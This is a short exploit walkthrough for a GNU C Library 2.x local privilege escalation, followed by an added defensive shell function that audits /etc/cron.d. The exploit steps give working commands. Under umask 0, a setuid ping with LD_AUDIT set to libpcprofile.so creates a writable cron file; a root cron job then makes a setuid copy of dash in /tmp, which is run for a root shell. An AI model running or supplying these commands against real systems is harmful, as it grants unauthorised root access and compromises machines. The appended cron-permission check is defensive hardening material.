GNU C Library
Enumeration

Check the installed glibc version:

ldd --version
GNU C Library 2.x (libc6)

GNU C Library 2.x (libc6) has a privesc exploit:

Exploitation
Step 1: The file creation mask (umask) is inherited by child processes and survives even a setuid execve, so it can be used to influence the permissions of files created during exploitation.
umask 0
Step 2: libpcprofile is distributed with the libc package.
dpkg -S /lib/libpcprofile.so
ls -l /lib/libpcprofile.so
Step 3: We identified that one of the pcprofile constructors is unsafe to run with elevated privileges, as it creates the file specified in the output environment variable.
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
ls -l /etc/cron.d/exploit
Step 4: Set up a cron job to give us privileges.
printf "* * * * * root cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit\n" > /etc/cron.d/exploit
ls -l /tmp/exploit
Step 5: Trigger the exploit and get a root shell.
/tmp/exploit
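As an added defensive check (not part of the original page), the script below lists entries in a cron drop-in directory that a non-root user could have written or tampered with; a world-writable file in /etc/cron.d is exactly the artifact that the umask 0 and PCPROFILE_OUTPUT steps above leave behind. The directory and expected owner are parameters with assumed defaults of /etc/cron.d and root, and a find implementation supporting symbolic -perm modes is assumed.

```shell
#!/bin/sh
# Added hardening check, not part of the original page: report files in a
# cron drop-in directory that are group- or world-writable, or that are not
# owned by the expected user. Such a file is the trace left by writing a cron
# entry with umask 0 from a process that should not have had that access.
#
# Usage: check_cron_dir [DIR] [OWNER]   (assumed defaults: /etc/cron.d, root)
# Prints one line per offending file; returns 1 if any were found, else 0,
# and 2 if the directory does not exist.
check_cron_dir() {
  dir="${1:-/etc/cron.d}"
  owner="${2:-root}"
  [ -d "$dir" ] || { echo "no such directory: $dir" >&2; return 2; }
  found=0
  for f in "$dir"/*; do
    [ -f "$f" ] || continue
    reason=""
    # group-writable: any member of the owning group could edit the job line
    if [ -n "$(find "$f" -perm -g+w)" ]; then reason="$reason group-writable"; fi
    # world-writable: any local user could edit the job line
    if [ -n "$(find "$f" -perm -o+w)" ]; then reason="$reason world-writable"; fi
    # wrong owner: the file was dropped in by someone other than the expected user
    if [ -z "$(find "$f" -user "$owner")" ]; then reason="$reason not-owned-by-$owner"; fi
    if [ -n "$reason" ]; then
      echo "SUSPICIOUS: $f:$reason"
      found=1
    fi
  done
  return $found
}
```

Running check_cron_dir with no arguments audits /etc/cron.d; a non-zero exit status means at least one entry needs attention.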